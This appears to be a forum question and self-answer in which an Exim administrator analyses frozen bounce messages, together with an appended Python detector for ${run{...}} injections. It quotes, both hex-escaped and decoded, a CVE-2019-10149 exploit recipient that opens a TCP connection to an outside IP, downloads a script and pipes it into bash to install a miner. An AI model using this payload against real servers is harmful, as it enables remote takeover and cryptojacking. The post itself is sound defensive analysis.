Sudden unidentified frozen emails with a recipient that looks like code injection
I suddenly received some strange "message frozen" emails from my server (Exim 4.89, Debian stable):
Message 1hcbPR-0005t1-2r has been frozen (delivery error message).
The sender is <>.
The following address(es) have yet to be delivered:
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost: Too many "Received" headers - suspected mail loop
$ sudo exim4 -Mvb 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-D

$ sudo exim4 -Mvh 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-H
Debian-exim 101 103
<>
1560715549 0
-helo_name localhost
-host_address 163.172.157.143.51642
-interface_address <MY.IP>.25
-received_protocol smtp
-body_linecount 0
-max_received_linelength 12
-frozen 1560715549
-host_lookup_failed
XX
1
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost

569P Received: from [163.172.157.143] (helo=localhost) by myserver.example.org with smtp (Exim 4.89) id 1hcbPR-0005t1-2r for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost; Sun, 16 Jun 2019 22:05:49 +0200
012P Received: 1
012P Received: 2
012P Received: 3
012P Received: 4
012P Received: 5
012P Received: 6
012P Received: 7
012P Received: 8
012P Received: 9
013P Received: 10
013P Received: 11
013P Received: 12
013P Received: 13
013P Received: 14
013P Received: 15
013P Received: 16
013P Received: 17
013P Received: 18
013P Received: 19
013P Received: 20
013P Received: 21
013P Received: 22
013P Received: 23
013P Received: 24
013P Received: 25
013P Received: 26
013P Received: 27
013P Received: 28
013P Received: 29
013P Received: 30
013P Received: 31
It looks like code injection, but I don't understand it; it doesn't look very harmful to me:
root+${run{/bin/bash -c "exec 5<>/dev/tcp/51.38.133.232/80;echo -e 'GET / HTTP/1.0\n' >&5;tail -n +11 <&5 | bash" &}}@localhost: Too many "Received" headers - suspected mail loop
All the messages are similar, with different IP addresses and ports. They all come from the same address.
Is it a known infection?
I found the answer before posting, and I think it might help others: it does correspond to an attempt to exploit an Exim vulnerability that allows remote execution of arbitrary code. It was announced and fixed a week ago (CVE-2019-10149).
More details about this vulnerability can be found here.
Update:
Actually, the injected code is not harmless at all:
exec 5<>/dev/tcp/51.38.133.232/80
assigns a new file descriptor 5 to a TCP connection to 51.38.133.232 on port 80. That is, redirecting to and from file descriptor 5 will write to and read from this IP!
Then
echo -e 'GET / HTTP/1.0\n' >&5
will send an HTTP GET request to that server, and
tail -n +11 <&5
will discard the HTTP headers, keeping only a malicious bash script, which is finally executed through the pipe into bash:
|bash
The script is a cryptojacking miner which, among other things, removes the root crontab and some administration tools (such as netstat), kills running processes to keep all the CPU for itself, and tries to spread via SSH…
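A small detection helper, added here as an example and not part of the original question or answer: it looks for `${run{...}}` expansion items in recipient addresses, bounce text or spool-header lines and resolves Exim's \xHH escapes so the command can be reviewed rather than decoded by hand. The sample input reuses the recipient string quoted above; the benign address beside it is constructed.

```python
import re

# An Exim string-expansion item that executes a command. Its presence in an
# envelope recipient is the signature of the CVE-2019-10149 exploitation
# attempts described above; the body is usually obfuscated with \xHH escapes.
RUN_ITEM = re.compile(r"\$\{run\{(.*?)\}\}")
HEX_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_exim_escapes(s: str) -> str:
    """Resolve the \\xHH escapes accepted by Exim's string expander."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)


def find_run_injections(text: str) -> list:
    """Return the decoded body of every ${run{...}} item found in text.

    The non-greedy match stops at the first '}}', which is enough for the
    flat payloads seen in these attempts (nested braces are not handled).
    """
    return [decode_exim_escapes(body) for body in RUN_ITEM.findall(text)]


def scan_lines(lines):
    """Yield (line_number, decoded_command) for each line carrying ${run{...}}.

    Feed it the recipient lines of a frozen-message bounce, the output of
    'exim4 -Mvh <id>', or lines from Exim's mainlog.
    """
    for n, line in enumerate(lines, 1):
        for cmd in find_run_injections(line):
            yield n, cmd


# Sample input: a constructed benign address, then the recipient string
# from the bounce quoted above (raw string, so the backslashes stay literal).
SAMPLE_LINES = [
    "alice+newsletter@localhost",
    r"root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e"
    r"\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e"
    r"\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54"
    r"\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b"
    r"\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62"
    r"\x61\x73\x68\x22\x20\x26}}@localhost",
]

if __name__ == "__main__":
    for line_no, cmd in scan_lines(SAMPLE_LINES):
        print(f"line {line_no}: ${{run{{...}}}} decodes to: {cmd}")
```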